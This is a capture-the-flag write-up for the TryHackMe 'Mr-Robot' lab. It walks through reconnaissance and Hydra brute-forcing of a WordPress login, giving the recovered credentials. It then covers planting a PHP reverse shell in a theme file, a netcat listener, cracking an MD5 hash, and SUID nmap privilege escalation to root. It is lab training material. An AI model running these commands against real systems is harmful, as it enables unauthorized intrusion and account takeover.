Mr-Robot — TryHackMe — WriteUp

Hello everyone. I’m Rahmos. Here is my Mr-Robot — TryHackMe — WriteUp. Check it out!

1/ The first key

First of all, let’s nmap the <ip> to see which port is opened.

nmap -A -T4 -p- vv<ip>

nmap

You can see there are port 80 and 443 are opened. Which means that an Apache web server is currently running under this machine.

So let’s check the website at port 80:

It first shows up a video, and some commands. It’s not really useful for me to find information.

Take a look at the “Hint”, it says “Robots”. Let’s go to “http://<ip>/robots.txt”

robots.txt

Here, I can see our the key: key-1-of-3.txt

Go to “http://<ip>/key-1-of-3.txt”

1st key

2/ The second key

The “Hint” says: White color font. Not really clear, right? So let’s find out.

Roll back to robots.txt, there is a file call “fsocity.dic”. Let’s download the file using wget

wget -O robotpasswd.txt http://<ip>/fsocity.dic

*I choose robotpasswd.txt as my filename, you can choose any name you want.

Take a look at the file I’ve just downloaded. It looks like a large password file. So up next, I need to brute the password.

However, which page I’m gonna login? Let’t use dirbuster to search for hidden directories of the website.

Alternatively you can use gobuster if you prefer CLI. Here’s the command:

gobuster dir -u http://<ip> -w /path-to-wordlist

dirbuster

Here, you can see a wp-login page response status code 200, which means we can access this page. Moreover, we know that this page is using Wordpress.

wp-login

Access “http://<ip>/wp-login.php”. I can now brute the username and password using Hydra

Hydra

I need to get the http post form first, cause Hydra requires that information to operate.

Using Burpsuite to intercept request, I can get the http-post-form. Just enter any username and password to login.

Burpsuite

The login page gives the notification: “Invalid username”. Note that for Hydra.

Invalid Username

Now, let’s use Hydra to get the username first:

hydra -L robotpasswd.txt -p test <ip> http-post-form “/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username” -t 30 -I -f

Hydra got the username

I’ve got the username “Elliot”. Try to use this username to login.

Invalid password

A different notification for wrong password. Note that for Hydra.

Now let’s Hydra the password!

hydra -l Elliot -P robotpasswd.txt <ip> http-post-form “/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username” -I -f

Wait a while and I’ve got the correct password: ER28–0652

Login to page and now I can access the admin page:

Admin Page

Now, let’s find a way to upload php-reverse-shell to the webpage.

In wp-admin, go to left navigation bar and select Appearance → Editor and then select Archives (archive.php) on the right

Paste the content of php-reverse-shell to archive.php

*Remember to change the <ip> address to your openVPN address of Tryhackme. You can find it by accessing: 10.10.10.10 in your browser.

Change the IP address

Click Update and let’s open netcat to listen to the port 1234.

nc -lvnp 1234

Open “http://<ip>/wp-content/themes/twentyfifteen/archive.php”

and I’ve got the reverse shell into the machine!

reverse shell

Spawn a tty shell using Python:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

export TERM=xterm

Move around to see files:

You can see the “key-2-of-3.txt.” However, I cannot read this file as “daemon”. So let’s crack robot’s password using the file “password.raw-md5”.

robot’s password

Copy the MD5 hash and go to this link to decrypt robot’s password:

robot’s password

Now let’s su robot using the password above. Got the 2nd key!

2nd key

3/ The final key

Let’s move to the final key. Look at the hint, it says “nmap”. So I know that I can priv escalation using nmap. Use “find” to look for SUID:

find / -perm -u=s -type f 2>/dev/null

find

Here you can see nmap! Open an interactive shell using nmap:

nmap — interactive

Run this command to get root:

!sh

Now i’m root!

root shell

Let’s cd to /root and get the final key!

final key

The end.

HAPPY HACKING

I’m Groot